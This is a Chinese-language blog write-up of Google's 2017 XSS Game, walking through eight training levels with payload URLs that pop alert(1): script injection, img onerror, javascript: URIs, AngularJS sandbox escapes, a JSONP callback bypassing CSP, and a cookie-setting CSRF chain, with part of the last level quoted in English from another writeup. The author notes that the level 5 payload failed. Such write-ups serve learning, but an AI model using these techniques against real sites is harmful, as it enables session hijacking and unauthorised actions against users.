Google xss挑战赛(2017) writeup

前言

这是去年的谷歌xss挑战赛，偶然之间碰到，对于我这种xss小白来说，还是收获了不少。

这里的xssgame通关要求是只要弹出alert窗口就OK，共八关。Let's go.

地址: http://www.xssgame.com (需翻墙)

Level 1

url： http://www.xssgame.com/f/m4KKGHi2rVUN/?query=%3Cscript%3Ealert(1)%3C/script%3E

Level 2

url： http://www.xssgame.com/f/WrfpuKFX8GNr/?timer=1

这是一个定时器，代码如下

image
问题出在parseInt(seconds)上,当我们提交seconds='-alert(1)-'时候，执行语句就变长 parseInt(''-alert(1)-'') 我们可以在浏览器控制台运行一下这一句。 image

这里并非是parseInt函数的问题，而是浏览器先解释运行alert(1)，然后再做了两个减法。我们将parseInt换成其他函数也是同样的效果。

提交: http://www.xssgame.com/f/WrfpuKFX8GNr/?timer='-alert(1)-'

Level 3

url: http://www.xssgame.com/f/u0hrDTsXmyVJ/#1

image image

很显然是用img标签闭合，onerror触发，但这里我踩了一个坑。谷歌浏览器可以触发，火狐不行,火狐会进行一次urlendode导致无法闭合标签。

提交: http://www.xssgame.com/f/u0hrDTsXmyVJ/#'onerror=alert(1)>

image

火狐

image

Level 4

url: http://www.xssgame.com/f/__58a1wgqGgI/

view-source:http://www.xssgame.com/f/__58a1wgqGgI/confirm?next=xsss

image

payload相信都见过，一时没想起来是在这里可以用的。菜得飞起。

提交: http://www.xssgame.com/f/__58a1wgqGgI/confirm?next=javascript:alert(1)

image

Level 5

url: http://www.xssgame.com/f/JFTG_t7t3N-P/

这是一个搜索框，页面虽然有输出，但是会将字符实体化，编码绕过无效。

关键点在这里。

image

angular JS 是一个前端框架，爆过模板注入漏洞。

参考文章:
AngularJS沙箱绕过：反射型XSS导致麦当劳用户密码泄露
Angular JS模板注入漏洞分析

这里框架版本是1.5.8版本

image

这里可以找到许多版本的poc：http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

回到题目，

image

提交:http://www.xssgame.com/f/JFTG_t7t3N-P/??utm_term=&utm_campaign={{x%20=%20{%27y%27:%27%27.constructor.prototype};%20x[%27y%27].charAt=[].join;$eval(%27x=alert(1)%27);}}

按网上已有wp提交过不了，不知道为什么这里卡住了

Level 6

url: http://www.xssgame.com/f/rWKWwJGnAeyi/

奥不会...wp都没看懂

提交?query={{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

Level 7

url:http://www.xssgame.com/f/wmOM2q5NJnZS/

keywords是csp

image

menu参数base64编码，jsonp加载了一个页面

image

碰巧前一天看了spleated的这篇JSONP利用，了解了一些关于jsonp的内容。

系统的介绍jsonp可以参考这篇文章JSONP安全攻防技术

xss在menu里面，根据上面的参考文章

image

我们提交<script src="jsonp?callback=alert(1)%3b%2f%2f"></script>base64编码后的代码 PHNjcmlwdCBzcmM9Impzb25wP2NhbGxiYWNrPWFsZXJ0KDEpJTNiJTJmJTJmIj48L3NjcmlwdD4=

提交: http://www.xssgame.com/f/wmOM2q5NJnZS/?menu=PHNjcmlwdCBzcmM9Impzb25wP2NhbGxiYWNrPWFsZXJ0KDEpJTNiJTJmJTJmIj48L3NjcmlwdD4=

Level 8

url: http://www.xssgame.com/f/d9u16LTxchEi/

关键词是CSRF

懵逼了半天，贴一下别人的writeup

The last one mixes the previous challenges into one: the exploit must work for any user, logged in or not, and CSRF, self-XSS and CSP should be exploited in order to win, the introduction says.

It is possible to execute bank transfers logging into an account by username (optional) and sending a transfer with ‘name’ and ‘amount’ values. After the login a ‘username’ cookie is set containing the username entered, name and amount of the transfer are sent as GET parameters, alongside a random 16 bytes CSRF token saved as cookie. CSP is defined like level 7.

Looking into the transfer procedure it is clear the amount field is vulnerable to reflected XSS and the CSP is not defined, however it is just the ‘self-XSS’ part of the challenge and it works only with a ‘csrf_token’ parameter matching the homonym cookie.

During the ‘login’ procedure we notice a request to <challenge url>/set?name=username&value=<username entered>&redirect=index, which would set our ‘username’ cookie and send us back to the homepage.

Using this ‘feature’ we can set an arbitrary cookie with an arbitrary value and redirect the user to an arbitrary page. In our case we can set the ‘csrf_token’ cookie and redirect the user to ‘/transfer’ where the transfer will be executed because the cookie and the ‘csrf_token’ GET parameter match:

<challenge url>/set?name=csrf_token&value=arbitrary&redirect=url_encode(/transfer?name=attacker&amount=3"><script>alert(1)</script>&csrf_token=arbitrary)

(using url_encode for better readability, the argument should be url-encoded in the URL.)

image

自×xss:

http://www.xssgame.com/f/d9u16LTxchEi/transfer?name=deen&amount=3%22%3E%3Cscript%3Ealert(1)%3C/script%3E&csrf_token=IF0BSGV0XH

运用redirect重定向csrf

image

提交:

http://www.xssgame.com/f/d9u16LTxchEi/set?name=csrf_token&value=IF0BSGV0XH&redirect=transfer?name=deen&amount=3"><script>alert(1)</script>&csrf_token=IF0BSGV0XH

要进行urlencode

http://www.xssgame.com/f/d9u16LTxchEi/set?name=csrf_token&value=IF0BSGV0XH&redirect=transfer%3Fname%3Ddeen%26amount%3D3%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%26csrf_token%3DIF0BSGV0XH

参考文章

• Google最新XSS Game Writeup

• XSSGame by Google at #HITB2017AMS – Writeup

• JSONP 安全攻防技术

• XSS without HTML: Client-Side Template Injection with AngularJS